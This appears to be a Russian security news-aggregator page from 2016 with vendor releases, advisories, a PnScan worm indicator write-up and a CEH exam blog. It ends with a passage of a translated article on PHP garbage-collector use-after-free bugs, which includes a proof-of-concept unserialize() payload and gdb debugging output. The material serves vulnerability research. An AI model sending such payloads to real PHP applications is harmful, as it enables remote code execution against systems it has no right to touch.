Новости мира информационной безопасности. Расследование и реагирование на инциденты. Кибербезопасность.

[ Цифровая криминалистика | Реагирование на инциденты ]

Новости информационной безопасности

IT & 
Security NewsFeed

Следующие 100 записей

ЛК усовершенствовала защиту домашних пользователей

«Лаборатория Касперскогоinfo-icon» представляет новую версию своего флагманского решения для защиты домашних пользователей Kaspersky Internet Securityinfo-icon для всех устройств. Продукт теперь может предложить пользователям дополнительную защиту при соединениях через публичные сети Wi-Fi. Кроме того, решение поможет с обновлением устаревшего и удалением ненужного программного обеспечения.

По данным исследования «Лаборатории Касперского»*, 87% россиян предпочитают в поездке подключаться к общественным точкам доступа Wi-Fi. При этом каждый восьмой путешественник из России становился жертвой киберпреступников в поездке. Кроме того, даже находясь в своем родном городе, пользователи ежедневно выходят в Сеть в кафе, кино, транспорте и т.д. Подключение к Интернету с помощью публичного Wi-Fi далеко не всегда безопасно, ведь это дает злоумышленникам возможность перехватить логины и пароли, а также другую ценную информацию, которая передается при использовании таких сетей.

Специально для защиты пользователей открытого публичного Wi-Fi в новой версии продукта для ОС Windows реализована функция «Безопасное соединение». Этот модуль обеспечивает безопасность подключения к общественным беспроводным сетям за счет предоставления зашифрованного канала связи. «Безопасное соединение» шифрует все передаваемые и получаемые из Интернета данные, что делает их недоступными для посторонних. 

 

Обновленная защита Kaspersky Internet Security для всех устройств

 

 

Еще две новых функции в Kaspersky Internet Security для всех устройств помогают пользователю управлять программным обеспечением и следить за его своевременным обновлением. Так, модуль с соответствующим названием «Обновление программ» находит приложения и программы, требующие обновления, и, с согласия пользователя, устанавливает последние официальные версии от разработчиков. Таким образом, защитное решение закрывает программные уязвимости, которыми могут воспользоваться злоумышленники для заражения устройства. Поиск и обновление программ происходит в фоновом режиме и оказывает минимальное влияние на работу устройства.

Однако помимо программного обеспечения, требующего обновления, на устройствах пользователей нередко есть приложения, с которыми они давно не работали и о существовании которых забыли или даже не знали. Как показал проведенный «Лабораторией Касперского» опрос**, почти каждый третий (29%) россиянин хранит на своем устройстве программы, которыми не пользуется уже очень давно. Эти приложения не только замедляют работу устройства, они потенциально могут стать теми «воротами», через которые в систему попадет зловред. Специально для того чтобы избавить пользователей от таких рисков, «Лаборатория Касперского» включила в Kaspersky Internet Security для всех устройств функцию «Удаление программ». Этот модуль сканирует все установленное ПО и выявляет как те программы, с которыми пользователь почти не работает, так и те, о существовании которых он, возможно, вовсе не знает, – например, дополнительные приложения, установленные при скачивании какого-либо ПО. После извещения об обнаружении таких программ пользователь сам принимает решение, какие из них удалить. 

«Мы считаем, что IT-безопасность – вопрос не только эффективности защитного решения, но и цифровой грамотности. Пользователь с высоким уровнем киберграмотности обычно аккуратно и внимательно ведет себя в Интернете и при этом готов применять новейшие технологии для защиты персональной информации, файлов, тайны личной жизни, самих устройств или же спокойствия других членов семьи. И мы стремимся дать пользователю такие возможности с каждой новой версией своих решений», – рассказывает Елена Харченко, руководитель отдела управления продуктами для домашних пользователей «Лаборатории Касперского».

Одновременно с Kaspersky Internet Security для всех устройств «Лаборатория Касперского» выпускает обновленную версию продукта с максимальным уровнем защиты домашних пользователей – Kaspersky Total Security для всех устройствinfo-icon. В нем доступны все новые и усовершенствованные функции флагманского решения, а также «Менеджер паролей», Kaspersky Safe Kidsinfo-icon, функция автоматического резервного копирования данных и технологии шифрования файлов, что обеспечивает надежную защиту частной жизни пользователя в Сети.  

*Исследование «Интернет в путешествиях: опасности и защита» проведено специально для «Лаборатории Касперского» в 2016 году. В опросе приняли участие 11 850 респондентов со всего мира, в том числе из России, США, стран Европы, Азии и Латинской Америки. В России было опрошено 1000 человек.

**Данные исследования поведения пользователей в Сети, проведенного «Лабораторией Касперского» в 2015 году среди более 18 тысяч интернет-пользователей старше 18 лет из 16 стран по всему миру, в том числе 1056 человек из России.

orig: 2016-08-24 15:44:31 / https://www.anti-malware.ru/news/2016-08-24/20767 (click post title)



Trend Micro представила отчет по ИБ за первое полугодие 2016 года

Компания Trend Microinfo-icon опубликовала отчет по информационной безопасности за первое полугодие 2016 года «Время программ-вымогателей» (The Reign of Ransomware). Как и прогнозировали эксперты TrendMicro, 2016 год стал годом онлайн-вымогательства.

В новом отчете анализируются основные тенденции в области кибератак, а также уязвимости, обнаруженные в первой половине текущего года. В нем также представлены подробные данные, свидетельствующие об увеличении числа атак и ущерба от них. Например, по данным отчета, в первом полугодии 2016 года количество программ-вымогателей выросло на 172%, финансовые потери от мошенничества с использованием корпоративной электронной почты (Business Email CompromiseBEC) только в этом году составили 3 млрд долларов США, а число уязвимостей в различных продуктах составило около 500.

«Программы-вымогатели способны нанести большой ущерб организациям, а киберпреступники, стоящие за такими атаками, постоянно совершенствуют свои методы, – говорит Раймунд Гинес (Raimund Genes), СТО TrendMicro. – Программы-вымогатели остаются самой крупной киберугрозой 2016 года и приводят к значительным потерям для бизнеса в различных отраслях. Предприятиям необходимо внедрять многоуровневые решения для защиты, чтобы эффективно противостоять этим угрозам, которые могут проникнуть в корпоративную сеть в любой момент».

Главные выводы отчета:

 

 

 

 

 

 

 

Всего, за первые шесть месяцев текущего года было обнаружено 79 новых разновидностей программ-вымогателей, что превышает их общее количество, обнаруженное за весь 2015 год. Все они привели к финансовым потерям, которые оцениваются в более чем 209 млн долларов США. Кибератаки с целью вымогательства, зафиксированные в первой половине 2016 года, например, такие как BEC, в 58% случаев были совершены с использованием электронной почты.   

Эксперты зафиксировали рост и развитие как уязвимостей, так и наборов эксплойтов. AnglerExploitKit стал использоваться реже, в то же время другие наборы эксплойтов, например, Neutrino заняли его место. Для повышения эффективности и актуальности наборов эксплойтов были добавлены новые уязвимости и программы-вымогатели. Программное обеспечение без обновлений продолжает предоставлять злоумышленникам дополнительные возможности заражения сетей при помощи наборов эксплойтов.

За первую половину 2016 года TrendMicro обнаружила 473 уязвимости в различных продуктах, 28 из которых были обнаружены в Adobe Flash Player, а 108 – в Advantech Web Access, что наглядно демонстрирует возможности команды исследований компании.

 

«К несчастью, киберпреступники умеют очень хорошо приспосабливаться, и, когда мы выпускаем патч или находим решение проблемы, они находят все новые способы для атак, – говорит Эд Кабрера (Ed Cabrera), Chief Cybersecurity Officer, TrendMicro. – Это создает колоссальные проблемы как для компаний, так и для отдельных пользователей, поскольку, как только предлагаются решения для существующих угроз, сами угрозы видоизменяются. Организациям лучше всего предвидеть возможность атаки и подготовиться заранее, внедряя новейшие решения для информационной безопасности, применяя виртуальный патчинг, а также проводя обучение сотрудников. Это позволит многократно уменьшить риски угроз».

orig: 2016-08-24 15:34:53 / https://www.anti-malware.ru/news/2016-08-24/20766 (click post title)



Red Hat Security Advisory 2016-1756-01

Red Hat Security Advisory 2016-1756-01 - KVM is a full virtualization solution for Linux on AMD64 and Intel 64 systems. The qemu-kvm-rhev package provides the user-space component for running virtual machines using KVM in environments managed by Red Hat Enterprise Virtualization Manager. Security Fix: Quick Emulator built with the Block driver for iSCSI images support is vulnerable to a heap-based buffer overflow issue. The flaw could occur while processing iSCSI asynchronous I/O ioctl calls. A user inside a guest could exploit this flaw to crash the QEMU process resulting in denial of service, or potentially leverage it to execute arbitrary code with QEMU-process privileges on the host.

orig: 2016-08-24 14:06:31 / https://packetstormsecurity.com/files/138488/RHSA-2016-1756-01.txt (click post title)



Slackware Security Advisory - gnupg Updates

Slackware Security Advisory - New gnupg packages are available for Slackware 13.0, 13.1, 13.37, 14.0, 14.1, 14.2, and -current to fix a security issue.

orig: 2016-08-24 14:06:19 / https://packetstormsecurity.com/files/138487/SSA-2016-236-01.txt (click post title)



MMD-0055-2016 - Linux/PnScan ; ELF worm that still circles around

Background

Just checked around internet and found an interesting ELF worm distribution that may help raising awareness for fellow sysadmins. As per shown in title, it's a known ELF malware threat, could be a latest variant of "Linux/PnScan", found in platform x86-32 that it seems run around the web within infected nodes before it came to my our hand. This worm is more aiming embed platform and I am a bit surprised to find i86 binary is hitting some Linux boxes.

This threat came to MalwareMustDie ELF team task before and I posted analysis in Mon Sep 28, 2015 on kernelmode [link] along with its details and threat, I thought the threat is becoming inactive now and it looks like I'm wrong, as the malware works still in infection now as worm functions and is hardcoded to aim 183.83.0.0 / 16 segment (located in network area of Telangana and Kashmir region of India), where it was just spotted. Since I never write about this threat in this blog (except kernelmode), it will be good to raise awareness to an active working and alive worm.

Threat Indicators

For some reason we can't inform infection source, but the source is in the targeted network mentioned above.

The file is having below indicator:


Filename: 'stdin'(.pnscan.x86-32.mmd)
Type: 'ELF 32-bit LSB executable, Intel 80386' (GNU/Linux) statically linked, stripped
Packer: 'UPX (header bit tweak) packed,'
Spotted: 'Tue Aug 23 12:27:21 UTC 2016'
md5: '6fb6f95546d5bdf4db11655249ee5288'
sha1: '2d3e2ce680de6c13ab3236429efd4bca3bfaa79d'
According to VirusTotal it's firstly spotted months ago:
'First submission 2016-01-27 05:26:45 UTC'

Static check will find the packed and tweaked UPX was used.


ELF Header: '↓typical packed one'
Magic: 7f 45 4c 46 01 01 01 03 00 00 00 00 00 00 00 00
Class: ELF32
Data: 2's complement, little endian
Version: 1 (current)
OS/ABI: UNIX - GNU
ABI Version: 0
Type: EXEC (Executable file)
Machine: Intel 80386
Version: 0x1
Entry point address: 0xcfce38
Start of program headers: 52 (bytes into file)
Start of section headers: 0 (bytes into file)
Flags: 0x0
Size of this header: 52 (bytes)
Size of program headers: 32 (bytes)
Number of program headers: 2
Size of section headers: 40 (bytes)

Program Headers: ↓'Typical UPX'
Type Offset VirtAddr PhysAddr FileSiz MemSiz Flg Align
LOAD 0x000000 0x00c01000 0x00c01000 0xfc661 0xfc661 R E 0x1000
LOAD 0x000d68 0x08290d68 0x08290d68 0x00000 0x00000 RW 0x1000
This worm is using customized UPX form of header to avoid RE / decoding↓

0x00000000 7f45 4c46 0101 0103 0000 0000 0000 0000 .ELF............
0x00000010 0200 0300 0100 0000 38ce cf00 3400 0000 ........8...4...
0x00000020 0000 0000 0000 0000 3400 2000 0200 2800 ........4. ...(.
0x00000030 0000 0000 0100 0000 0000 0000 0010 c000 ................
0x00000040 0010 c000 61c6 0f00 61c6 0f00 0500 0000 ....a...a.......
0x00000050 0010 0000 0100 0000'680d 0000 680d 2908' ........h...h.).
0x00000060 680d 2908 0000 0000 0000 0000 0600 0000 h.).............
0x00000070 0010 0000 22c0 e4b8 5550 5821 3408 0d0c ...."...UPX!4...
0x00000080 0000 0000 783f 2400 783f 2400 9400 0000 ....x?$.x?$.....
0x00000090 5d00 0000 0800 0000 771f a4f9 7f45 4c46 ].......w....ELF
0x000000a0 0100 0200 0300 1b68 8104 fbaf bddf 0834 .......h.......4
0x000000b0 0ef8 3c24 2f16 2032 2800 1000 0f00 5b5c ..[link]
Sample is in VirusTotal [link]
Dr. Web wrote about this threat [link]
PS: The warning of this threat was sent to regional CERT.

#MalwareMustDie!

orig: 2016-08-24 13:40:10 / http://blog.malwaremustdie.org/2016/08/mmd-0054-2016-pnscan-elf-worm-that.html (click post title)



Атака SWEET32 на шифры 3DES и Blowfish позволяет расшифровать файлы cookie

Исследователи официально представят атаку в следующем месяце.

В последнее время все больше браузеров отказываются от использования потокового шифра RC4. Похоже, в скором времени такая же участь постигнет Triple-DES (3DES) и Blowfish, считают исследователи Гаэтан Лоран (Gaetan Leurent) и Картхикейан Бхаргаван (Karthikeyan Bhargavan).

На конференции ACM Conference on Computer and Communications Security, которая в следующем месяце пройдет в Австрии, эксперты представят атаку SWEET32 на 64-битные шифры. По их словам, с ее помощью можно получить использующиеся для аутентификации файлы cookie из трафика, зашифрованного с помощью 3DES и передаваемого по HTTPS. Кроме того, атака позволяет восстановить имена пользователей и пароли из трафика, передаваемого через OpenVPN и зашифрованного с помощью Blowfish.

SWEET32 представляет собой атаку поиска коллизий на шифры в режиме CBC (режим сцепления блоков шифротекста с использованием механизма обратной связи). Как пояснили эксперты, такие 64-битные шифры, как 3DES и Blowfish, по-прежнему поддерживаются в TLS, IPsec, SSH и других протоколах. По словам Лорана, браузеры не спешат отказываться от 3DES и просто ждут, пока шифром перестанут пользоваться. В настоящее время SWEET32 не является распространенной атакой, однако разработчики и предприятия должны поступить с ними так же, как с RC4, уверены эксперты.

orig: 2016-08-24 12:30:50 / http://www.securitylab.ru/news/483494.php (click post title)



Стал CEH

Да, именно так и выглядят хакеры на самом деле


Сдал экзамен EC-counsil 312-50 Certified Ethical Hacker, CEH v9. Зачем сдавал

1. СЕН стабильно называют одним из 5 топ сертификатов по ИБ

2. За сдачу CEH дают CPE баллы для CISSP (каждый час обучения = 1 балл CPE. Максимум 30 баллов)

3. Экзамен весёлый. Нудных вопросов не так много, зато много технических и практических 

4. Сдать CEH - это единственный способ называть себя официально хакером )

Интерес к СЕНу серьезно подогрет тем, что госструктуры США требуют наличие этого сертификата для определенных должностей ИБ (DoD 8750).

Этим, наверное, можно объяснить и конский ценник в 500-600 долларов за экзамен и 100 долларов за "проверку" твоего стажа (не менее 2х лет в области ИБ). 

Хотя, в целом, идея МинОбороны США мне нравится. Из ВУЗов у нас выходят, в большинстве своём, очень сырые специалисты (по себе сужу), а CEH даёт серьезный багаж технических знаний в области пентестов и в целом ИБ.

Но главная проблема CEH - это тест с вариантами ответов, совершенно не требующий воображения и творчества. OCSP  в этом отношении намного интересней, но ценник там что-то еще хуже :(. Как готовился

Традиционно, в метро. 

Прочитал несколько книжек:

1. CEH Certified Ethical Hacker All-in-One Exam Guide, Second Edition, 2014 (Гайд по CEH v8. Отличия от v9 минимальны). Вначале не пошла. Уж больно автор любит приводить примеры из личной жизни и растекаться мыслью по древу. Но, к моему удивлению, оказалось, что в этой книжке наиболее сжато и конкретно изложен весь необходимый материал. Книжка стала в итоге основной, а стиль изложения можно назвать таки удачным. 

2. CEH: Certified Ethical Hacker: Study Guide by Kimberly Graves. Не пошла. Хотя материал и изложен сжато, но объем книжки в итоге больше, чем первой.

3. CEH Certified Ethical Hacker Practice Exams, Second Edition. Книжка с тестовыми вопросами. По 20-25 вопросов на каждую из 11 глав гайда. Полезная вещь.

Решал тесты:

1. Дампы с gratisexam. Совпадений с реальным экзаменом 0, но на телефоне решать удобно. Имейте ввиду: ошибки в дампах частое дело. 

2. TestPrep 312-50 Certified Ethical Hacker (CEH). Приложение с вопросами и тестовым экзаменом. Понравилось. Лучше, чем книга Practice Exam. Досталось на халяву по корпоративной подписке

Практика

Не занимался. Как то хватило старого опыта. Хотя имейте ввиду, бывают и вопросы вида "какая хакерская тулза изображена на скриншоте?". Вопросов про хактулы и их вывод очень много. Лучше основные из них "знать в лицо" (любят nmap, Burp, hping2, Cain and Abel, Wireshark).


Как сдавал

Тут начинается самое интересное. Экзамен можно сдавать в PersonVue (600 баксов), а можно и дома (!) через сервис proctoru.com (500 баксов). Решил попробовать дома.

В назначенное время через модифицированную утилиту LogMeIn к твоему компьютеру подключается специалист сервиса, вырубает всё лишнее из таскбара, запускает скрипт, выключающий возможность делать скриншоты, проверяет, что в настройках дисплея стоит только один монитор. Просит предъявить в вебкамеру два ID с фото (паспорт и права), просит повертеть камерой во все стороны. Если вебкамера в ноутбуке, то просят принести зеркало. 

Отпечатки HTTPS сертификата не проверяют, что, конечно, стало их большой ошибкой :)

Перед собой можно иметь только пару листиков и ручку. У меня была еще шоколадка и кофе.

Экзамен состоит из 125 вопросов, на которые дают 4 часа времени. Вставать из-за компьютера нельзя (вебкамера всё время работает). Когда я прикидывал на листике сетевые маски из вопроса, меня попросили смотреть всё же на монитор. Ты всегда должен быть в кадре. В каком то отношении в PersonVue сдавать попроще, можно выйти в туалет, размяться.  

В конце пишут только "сдал" или "не сдал". Количество набранных баллов не говорят как и в CISSP.

Про вопросы

Половина вопросов про уязвимости, хактулы и будни пентестера, четверть про сети, четверть про общую ИБ (криптография, реакция на инциденты, комплаянс и т.д.). Процентов 20 вопросов пересекаются с CISSP. Встретилось 2 вопроса на американское законодательство ИБ (HIPAA, Patriot Act), перетерпел. Акронимы и аббревиатуры не расшифровывают, что плохо. 

Бывают и подлые вопросы

There are several ways to gain insight on how a cryptosystem works with the goal of reverse engineering the process. A term describes when two pieces of data result in the same value is ?

Вот коллизия пишется через "i" или через "u"??

Бывают и смешные

Your next door neighbor, that you do not get along with, is having issues with their network, so he yells to his spouse the network's SSID and password and you hear them both clearly. What do you do with this information? 

Нужно хорошо знать TCP/IP и быть готовым ответить на такой вопрос: Чем ответит закрытый порт линукс машины если к нему прилетит пакет сканера nmap с ключём -sX?

Много и детских вопросов: TCP handshake, что быстрее асимметричная или симметричная криптография, как лучше всего защитить ноутбук от кражи информации (full disk encryption) и т.д. 

Были вопросы про heartbleed, shellshock. Это и есть, видимо, все изменения CEH v9 по сравнению с CEH v8. 

Что еще почитать?

[UPDATE] На сайте https://aspen.eccouncil.org в личном кабинете таки можно посмотреть баллы, набранные на экзамене

[UPDATE2] Проверить чужой статус можно тут https://aspen.eccouncil.org/verify.aspx

orig: 2016-08-24 12:26:46 / http://www.itsec.pro/2016/08/ceh.html (click post title)



MacQuisition™ 2016 R1 is Now Available

Wednesday, August 24, 2016 (12:04:43)

MacQuisition™ 2016 R1 is Now Available

BlackBag® Technologies is excited to announce the release of MacQuisition™ 2016 R1, our 3-in-1 solution for live data acquisition, targeted data collection, and forensic imaging. Our customers around the globe depend on our software's reliability to securely image hundreds of Macs. MacQuisition™ is the only forensic solution that runs within a native OS X boot environment, making it uniquely versatile.

With changes in Apple’s hardware and software comes improvement to MacQuisition™. MacQuisition™ now supports imaging RAM in the Macintosh 10.11 operating system. When MacQuisition™ is used on a live Mac OS X system, it will detect the operating system version to ensure it is a supported version and warn the user if the version is not supported for RAM imaging.

Improvements have also been made to the ‘Comments’ section, the ‘MacQuisition™ Updater’ application, and user interface consistency.

Not already using MacQuisition™? Contact our Forensic Analyst and Instructor team, [email protected], for a free 30-day fully functional trial license.

About the Company

BlackBag® Technologies is a developer of innovative forensic acquisition, triage, and analysis software for Windows, Android, iPhone/iPad, and Mac OS X devices. The company’s flagship product, BlackLight®, has been adopted worldwide by many digital forensics examiners as a primary analysis tool. Mobilyze, BlackBag®’s groundbreaking mobile device triage tool, empowers virtually all law enforcement personnel, with or without specialized experience, to capably triage and report on data from smartphones.

In addition to software, BlackBag® also develops and delivers expert forensic training and certification programs, designed to meet the needs of law enforcement, military and private sector examiners. Taught by an elite team with considerable law enforcement and digital forensics experience, the courses are tailored to address realistic, multi-platform scenarios simulating the daily challenges of digital evidence.

To learn more about BlackBag®’s software and training, please contact us at 855-844-8890, or visit us at blackbagtech.com.

orig: 2016-08-24 12:04:43 / http://www.forensicfocus.com/News/article/sid=2720/ (click post title)



В Сеть утекли данные 200 тыс. поклонников игры Grand Theft Auto

Причиной инцидента послужила уязвимость в движке vBulletin.

Во вторник, 23 августа, сайт gtagaming.com, посвященный игре Grand Theft Auto, сообщил о компрометации базы данных пользователей своего форума. В результате инцидента утекли электронные адреса, хешированные пароли и другие данные 200 тыс. поклонников GTA.

Как сообщает администрация ресурса, причиной инцидента послужила уязвимость в движке vBulletin, позволяющая осуществлять SQL-инъекции. Напомним, на этой неделе по той же причине в сеть утекли данные свыше 800 тыс. пользователей форумов Epic Games. Еще раньше злоумышленникам удалось взломать форум для разработчиков Dota 2, форум Clash of Kings, геймерский сайт DLH.net и форум, посвященный Ubuntu.

По словам ИБ-эксперта Троя Ханта (Troy Hunt), администраторы форумов не спешат устанавливать обновления, исправляющие уязвимость в vBulletin. Как отметил исследователь, на gtagaming.com использовалась версия vBulletin 3.8.7, выпущенная пять лет назад. Это был точечный релиз, а версия 3.0 вышла еще в 2004 году. «Для тех, кто не помнит столь далекие времена, напоминаю, тогда еще даже не было Facebook», - подчеркнул Хант.

Согласно уведомлению на сайте gtagaming.com, администрация ресурса намерена закрыть сайт, поскольку не может обеспечить пользователям надлежащую защиту от хакеров.

orig: 2016-08-24 11:44:07 / http://www.securitylab.ru/news/483493.php (click post title)



NII THREAT ADVISORY – 24 AUGUST 2016

Penetration Testing as per PCI DSS version 3.2 As per PCI DSS v3.2, Requirement 11.3 addresses penetration testing activity for organizations following PCI DSS compliance. The requirement is further divided into following sub requirements: Requirement 11.3.1: Conduct external penetration testing at least annually or after any significant change has occurred in organization’s environment Requirement 11.3.2: Read More...

orig: 2016-08-24 11:28:46 / http://niiconsulting.com/checkmate/2016/08/nii-threat-advisory-24-august-2016/ (click post title)



[Перевод] Ломаем сбор мусора и десериализацию в PHP

Эй, PHP, эти переменные выглядят как мусор, согласен?
Нет? Ну, посмотри-ка снова…

tl;dr:
Мы обнаружили две use-after-free уязвимости в алгоритме сбора мусора в PHP:


Уязвимости могут удалённо применяться через PHP-функцию десериализации. Используя их, мы отыскали RCE на pornhub.com, за что получили премию в 20 000 долларов плюс по 1000 долларов за каждую из двух уязвимостей от комитета Internet Bug Bounty на Hackerone.

Занимаясь проверкой Pornhub, мы обнаружили две критические утечки в алгоритме СМ (
How we broke PHP, hacked Pornhub and earned $20,000
). Речь идёт о двух важных use-after-free уязвимостях, которые проявляются при взаимодействии алгоритма СМ с определёнными PHP-объектами. Они приводят к далеко идущим последствиям вроде использования десериализации для удалённого выполнения кода на целевой системе. В статье мы рассмотрим эти уязвимости.

После фаззинга десериализации и анализа интересных случаев мы выделили два доказательства возможности use-after-free уязвимостей. Если вам интересно, как мы к ним пришли, то почитайте материал по ссылке. Один из примеров:

$serialized_string = 'a:1:{i:1;C:11:"ArrayObject":37:{x:i:0;a:2:{i:1;R:4;i:2;r:1;};m:a:0:{}}}';
$outer_array = unserialize($serialized_string);
gc_collect_cycles();
$filler1 = "aaaa";
$filler2 = "bbbb";
var_dump($outer_array);
// Result:
// string(4) "bbbb"

Наверное, вы думаете, что результат будет примерно таким:
array(1) { // внешний массив
    [1]=>
    object(ArrayObject)#1 (1) {
        ["storage":"ArrayObject":private]=>
        array(2) { // внутренний массив
            [1]=>
            // Ссылка на внутренний массив
            [2]=>
            // Ссылка на внешний массив
        }
    }
}

В любом случае после исполнения мы видим, что внешний массив (на него ссылается $outer_array) освобождён, а его zval перезаписан zval’ом $filler2. И в качестве результата мы получаем bbbb. Возникают следующие вопросы:
Похоже, вся магия происходит в функции gc_collect_cycles, которая вызывает сборщик мусора PHP. Нам нужно лучше понять её, чтобы разобраться с этим таинственным примером.

Содержание



В ранних версиях PHP не было возможности справиться с утечками памяти из-за циклических ссылок. Алгоритм СМ появился в PHP 5.3.0 (
PHP manual – Collecting Cycles
). Сборщик активен по умолчанию, его можно инициировать с помощью настройки zend.enable_gc в php.ini.

Обратите внимание: нужны базовые знания о внутренностях PHP, управлении памятью и вещах вроде zval’а и подсчёта ссылок. Если вы не знаете, что это, то сначала ознакомьтесь с основами: PHP Internals Book – Basic zval structure и PHP Internals Book – Memory managment.

Циклические ссылки
Для понимания сути циклических ссылок рассмотрим пример:
$test = array();
$test[0] = &$test;
unset($test);

Поскольку $test ссылается на самого себя, то его счётчик ссылок равен 2. Но даже если вы сделаете unset($test) и счётчик станет равен 1, память не освободится: произойдёт утечка. Для решения этой проблемы разработчики PHP создали алгоритм СМ в соответствии с документом IBM «Concurrent Cycle Collection in Reference Counted Systems».Инициирование сборщика
Основная реализация доступна здесь: Zend/zend_gc.c. При каждом уничтожении zval’а, т. е. когда он сбрасывается (unset), применяется алгоритм СМ, который проверяет, массив это или объект. Все остальные типы данных (примитивы) не могут содержать циклические ссылки. Проверка реализована путём вызова функции gc_zval_possible_root. Любой такой потенциальный zval называется root и добавляется в список gc_root_buffer.

Эти шаги повторяются до тех пор, пока не будет выполнено одно из условий:


Алгоритм маркировки графа для цикличного сбора (Graph Marking Algorithm for Cycle Collection)
Алгоритм СМ — это графовый алгоритм маркировки, применяемой к текущей графовой структуре. Узлы графа — это zval’ы вроде массивов, строк или объектов. Рёбра представляют собой связи/ссылки между zval’ами.

Для маркировки узлов алгоритм по большей части использует следующие цвета:

  • Пурпурный: потенциальный корень цикла сбора. Узел может быть корнем циклической ссылки. Все узлы, изначально добавляемые в мусорный буфер, маркируются пурпурным цветом.
  • Серый: потенциальный член цикла сбора. Узел может быть частью циклической ссылки.
  • Белый: член цикла сбора. Узел должен быть освобождён после остановки алгоритма.
  • Чёрный: используется или уже освобождён. Узел не должен освобождаться ни при каких обстоятельствах.

Чтобы разобраться в работе алгоритма, взглянем на его реализацию. Сбор мусора исполняется в gc_collect_cycles:
"Zend/zend_gc.c"
[...]
ZEND_API int gc_collect_cycles(TSRMLS_D)
{
[...]
        gc_mark_roots(TSRMLS_C);
        gc_scan_roots(TSRMLS_C);
        gc_collect_roots(TSRMLS_C);
[...]
        /* Free zvals */
        p = GC_G(free_list);
        while (p != FREE_LIST_END) {
            q = p->u.next;
            FREE_ZVAL_EX(&p->z);
            p = q;
        }
[...]
}

Эта функция заботится о следующих четырёх простых операциях:
  • gc_mark_roots(TSRMLS_C): применяется zval_mark_grey ко всем пурпурным элементам в gc_root_buffer. По отношению к текущему zval’у zval_mark_grey выполняет следующее:
    • — возвращает, если zval уже помечен серым;
    • — помечает zval серым;
    • — получает все дочерние zval’ы (только если текущий zval — это массив или объект);
    • — декрементирует счётчики ссылок дочерних zval’ов на 1 и вызывает zval_mark_grey.

    В целом на данном этапе маркируются серым корневой и другие доступные zval’ы, у всех этих zval’ов декрементируются счётчики ссылок.
  • gc_scan_roots(TSRMLS_C): применяется zval_scan (к сожалению, не вызывается zval_mark_white) ко всем элементам в gc_root_buffer. По отношению к текущему zval’у zval_scan выполняет следующее:
    — возвращает, если zval не серый;
    — если счётчик ссылок больше нуля, вызывает zval_scan_black (к сожалению, не вызывается zval_mark_black). По сути, zval_scan_black отменяет все действия, ранее выполненные zval_mark_grey ко всем счётчикам, и маркирует чёрным все доступные zval’ы;
    — текущий zval маркируется белым, а ко всем дочерним zval’ам применяется zval_scan (только если текущий zval — это массив или объект).
    В целом на данном этапе определяется, какие из серых zval’ов сейчас нужно маркировать чёрным или белым.
  • gc_collect_roots(TSRMLS_C): восстанавливаются счётчики ссылок у всех белых zval’ов. Также они добавляются в список gc_zval_to_free, эквивалентный списку gc_free_list.
  • Наконец, освобождаются все элементы gc_free_list, т. е. маркированные белым.

  • Этот алгоритм идентифицирует и освобождает все элементы циклических ссылок, сначала маркируя их белым цветом, затем собирая и освобождая. Более детальный анализ реализации выявил следующие потенциальные конфликты:
    • На этапе 1.4 zval_mark_grey декрементирует счётчики всех дочерних zval’ов до их проверки на маркированность серым цветом.
    • Поскольку счётчики ссылок zval’ов временно декрементированы, любой побочный эффект (наподобие проверок ослабленных счётчиков) или прочие манипуляции могут привести к катастрофическим последствиям.


    Вооружившись новым знанием о сборщике мусора, мы можем заново проанализировать пример с обнаруженной уязвимостью. Вызовем следующую сериализованную строку:
    $serialized_string = 'a:1:{i:1;C:11:"ArrayObject":37:{x:i:0;a:2:{i:1;R:4;i:2;r:1;};m:a:0:{}}}';
    

    Воспользовавшись gdb, мы можем использовать
    стандартный для PHP 5.6 .gdbinit
    , а также кастомную подпрограмму для дампинга содержимого буфера сборщика мусора.
    define dumpgc
        set $current = gc_globals.roots.next
        printf "GC buffer content:\n"
        while $current != &gc_globals.roots
            printzv $current.u.pz
            set $current = $current.next
        end
    end
    

    Теперь установим точку прерывания в gc_mark_roots и gc_scan_roots, чтобы посмотреть состояние всех соответствующих счётчиков ссылок.

    Нам нужно найти ответ на вопрос: почему освобождается внешний массив? Загрузим php-процесс в gdb, установим точки прерывания и выполним скрипт.

    (gdb) r poc1.php
    [...]
    Breakpoint 1, gc_mark_roots () at [...]
    (gdb) dumpgc
    GC roots buffer content:
    [0x109f4b0] (refcount=2) array(1): { // outer_array
        1 => [0x109d5c0] (refcount=1) object(ArrayObject) #1
      }
    [0x109ea20] (refcount=2,is_ref) array(2): { // inner_array
        1 => [0x109ea20] (refcount=2,is_ref) array(2): // reference to inner_array
        2 => [0x109f4b0] (refcount=2) array(1): // reference to outer_array
      }
    

    Как видите, после десериализации оба массива (внутренний и внешний) добавлены в буфер сборщика мусора. Если мы продолжим и прервёмся на gc_scan_roots, то получим следующие состояния счётчиков ссылок:
    (gdb) c
    [...]
    Breakpoint 2, gc_scan_roots () at [...]
    (gdb) dumpgc
    GC roots buffer content:
    [0x109f4b0] (refcount=0) array(1): { // внешний массив
            1 => [0x109d5c0] (refcount=0) object(ArrayObject) #1
        }
    

    gc_mark_roots действительно декрементировал все счётчики до нуля. Следовательно, эти узлы на следующих этапах могут быть маркированы белым и позднее освобождены. Но возникает вопрос: почему в первом случае счётчики обнулились?Отладка неожиданного поведения
    Давайте шаг за шагом пройдём через gc_mark_roots и zval_mark_grey, чтобы понять, что происходит.
  • zval_mark_grey применён к outer_array (вспомните, что outer_array добавлен в буфер сборщика мусора).
  • outer_array маркирован серым, а все его потомки извлечены. В нашем случае у outer_array только один потомок:
    “object(ArrayObject) #1” (refcount=1).
  • Счётчик ссылок потомка или ArrayObject декрементирован:
    “object(ArrayObject) #1” (refcount=0).
  • zval_mark_grey применён к ArrayObject.
  • Этот объект маркирован серым, а все его потомки извлечены. В данном случае к ним относятся ссылки на inner_array и на outer_array.
  • Счётчики ссылок у обоих потомков, т. е. у обоих zval’ов, на которые ведут ссылки, декрементированы:
    “outer_array” (refcount=1) and “inner_array” (refcount=1).
  • zval_mark_grey применён к outer_array без какого-либо эффекта, потому что outer_array уже маркирован серым (его обработали на втором этапе).
  • zval_mark_grey применён к inner_array. Он маркирован серым, а все его дети извлечены. Дети те же, что и на пятом этапе.
  • Счётчики ссылок обоих потомков снова декрементированы:
    “outer_array” (refcount=0) and “inner_array” (refcount=0).
  • Больше zval’ов не осталось, zval_mark_grey прерван.

  • Итак, ссылки, содержавшиеся в inner_array или ArrayObject, декрементированы дважды! Это определённо неожиданное поведение, ведь любая ссылка должна декрементироваться однократно. В частности, восьмого этапа вообще не должно быть, потому что все элементы уже обработаны и промаркированы ранее, на шестом этапе.
